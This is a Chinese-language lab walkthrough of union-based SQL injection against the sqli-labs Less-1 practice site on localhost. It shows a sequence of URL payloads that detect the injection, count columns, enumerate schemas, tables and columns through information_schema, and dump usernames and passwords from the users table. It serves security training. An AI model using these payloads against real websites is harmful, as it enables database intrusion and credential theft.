Get显错注入
1.初始页面如下:
2.在后面输入为?id=1--+:
3.在后面输入为?id=1 and 1=2--+,发现页面没有变化,猜测可能是字符型注入
4.在后面输入为http://127.0.0.1/sqlilabs/Less-1/?id=1' and 1=2--+,页面发生变化,确定为字符型注入
5. 开始通过order by猜测字段数量,发现字段数为3和字段数为4发生变化:
?id=1' order by 3--+
?id=1' order by 4--+
由此可判断字段数为3
6.将id值改为-1(即一个不存在的id值)联合查询获取显示位,发现显示位如下:
?id=-1' union select 1,2,3--+
7.开始获取数据库:
当前数据库:
?id=-1' union select 1,(select database()),3--+
所有数据库:
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+
8.获取当前数据库表名:
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+;
9.获取表中所有字段:
users表:
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
security.users表:
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'--+
10.自此到了尾声,直接获取我们需要的security.users表字段内容:
?id=-1' union select 1,group_concat(username),group_concat(password) from users--+